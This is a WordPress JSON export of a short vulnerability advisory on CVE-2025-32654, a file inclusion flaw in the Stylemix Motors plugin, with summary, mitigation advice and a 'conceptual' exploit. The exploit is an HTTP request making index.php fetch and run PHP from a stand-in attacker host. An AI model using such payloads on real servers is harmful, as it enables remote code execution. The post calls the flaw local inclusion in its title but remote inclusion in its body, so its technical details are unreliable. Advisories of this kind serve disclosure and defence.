{"id":29170,"date":"2025-04-22T14:43:52","date_gmt":"2025-04-22T14:43:52","guid":{"rendered":""},"modified":"2025-06-09T05:05:39","modified_gmt":"2025-06-09T11:05:39","slug":"cve-2025-32654-php-local-file-inclusion-vulnerability-in-stylemix-motors","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-32654-php-local-file-inclusion-vulnerability-in-stylemix-motors\/","title":{"rendered":"<strong>CVE-2025-32654: PHP Local File Inclusion Vulnerability in Stylemix Motors<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>This post provides a detail analysis of the newly disclosed vulnerability, CVE-2025-32654, that affects Stylemix Motors. This vulnerability is a result of improper control of filename for include\/require statement in the PHP program. To put it in simpler terms, it is a &#8216;PHP Remote <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2023-45724-unauthenticated-file-upload-vulnerability-in-hcl-dryice-myxalytics\/\"  data-wpil-monitor-id=\"33983\">File Inclusion&#8217; vulnerability<\/a>. It has far-reaching implications as it could <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2023-37297-vulnerability-in-ami-s-spx-leading-to-potential-system-compromise\/\"  data-wpil-monitor-id=\"33407\">potentially allow an attacker to compromise systems<\/a> or leak data. This <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-1782-critical-vulnerability-in-hylafax-enterprise-web-interface-and-avantfax\/\"  data-wpil-monitor-id=\"33580\">vulnerability is of significant importance to web<\/a> developers and administrators who use Stylemix Motors in their environments, as it has a high CVSS Severity Score of 8.1.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-32654<br \/>\nSeverity: High (CVSS: 8.1)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: None<br \/>\nUser Interaction: None<br \/>\nImpact: System compromise or <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2023-50350-broken-cryptographic-algorithm-leads-to-potential-data-leakage-in-hcl-dryice-myxalytics\/\"  data-wpil-monitor-id=\"33704\">data leakage<\/a><\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-3314652196\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 700px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 20px; font-weight: 600; display: flex; align-items: center;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 8px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 40px; height: 40px;\" \/>\r\n    <\/a>\r\n    A new way to communicate\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 12px;\">\r\n    Ameeba Chat is built on encrypted identity, not personal profiles.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 16px;\">\r\n    Message, call, share files, and coordinate with identities kept separate.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 20px;\">\r\n    <li>\u2022 Encrypted identity<\/li>\r\n    <li>\u2022 Ameeba Chat authenticates access<\/li>\r\n    <li>\u2022 Aliases and categories<\/li>\r\n    <li>\u2022 End-to-end encrypted chat, calls, and files<\/li>\r\n    <li>\u2022 Secure notes for sensitive information<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px;\">\r\n    Private communication, rethought.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Download Ameeba Chat<\/a>\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Learn More<\/a>\r\n  <\/div>\r\n<\/div>\r\n<\/div>\n<p>Product | Affected Versions<\/p>\n<p>Stylemix Motors | Up to version 1.4.65<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>This <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-23389-improper-access-control-vulnerability-in-suse-rancher\/\"  data-wpil-monitor-id=\"33349\">vulnerability occurs due to improper control<\/a> of filename in include\/require statement in PHP programs. An attacker can craft a specific request to the server, manipulating the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-32294-uncontrolled-filename-in-php-program-allows-local-file-inclusion\/\"  data-wpil-monitor-id=\"56199\">filename that the PHP<\/a> &#8216;include&#8217; or &#8216;require&#8217; statement tries to load. This can result in PHP <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-21860-arbitrary-code-execution-vulnerability-in-openharmony\/\"  data-wpil-monitor-id=\"33861\">executing code<\/a> from an unexpected, potentially malicious, location.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-2011106849\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>Here is a simplified, conceptual example of how the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2023-50123-exploitable-vulnerability-in-hozard-alarm-system-sms-authentication\/\"  data-wpil-monitor-id=\"34957\">vulnerability could be exploited<\/a>. This is not a real exploit code, but it gives you an idea of how an attacker could proceed.<\/p>\n<pre><code class=\"\" data-line=\"\">GET \/index.php?file=http:\/\/malicious.example.com\/malicious_file.php HTTP\/1.1\nHost: target.example.com<\/code><\/pre>\n<p>In this conceptual example, the attacker is trying to make the server load and <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2023-48243-critical-remote-code-execution-vulnerability-allowing-unauthorized-file-upload\/\"  data-wpil-monitor-id=\"34114\">execute a PHP file from a remote<\/a> location (&#8216;malicious.example.com&#8217;).<\/p>\n<p><strong>Mitigation<\/strong><\/p>\n<p>Affected users are encouraged to apply vendor patches as soon as they are available. In the interim, using a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) can provide temporary mitigation. These systems can be configured to block or alert on <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-39601-cross-site-request-forgery-vulnerability-in-wpfactory-custom-css-js-php\/\"  data-wpil-monitor-id=\"36048\">requests that appear to be trying to exploit this vulnerability<\/a>.<br \/>\nAs always, regular <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2023-52304-stack-overflow-vulnerability-in-paddlepaddle-leading-to-potential-system-compromise\/\"  data-wpil-monitor-id=\"34039\">system audits and security reviews can help identify potential<\/a> weaknesses and provide opportunities for improving system security.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview This post provides a detail analysis of the newly disclosed vulnerability, CVE-2025-32654, that affects Stylemix Motors. This vulnerability is a result of improper control of filename for include\/require statement in the PHP program. To put it in simpler terms, it is a &#8216;PHP Remote File Inclusion&#8217; vulnerability. It has far-reaching implications as it could [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-29170","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/29170","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=29170"}],"version-history":[{"count":11,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/29170\/revisions"}],"predecessor-version":[{"id":50219,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/29170\/revisions\/50219"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=29170"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=29170"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=29170"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=29170"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=29170"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=29170"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=29170"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=29170"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=29170"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}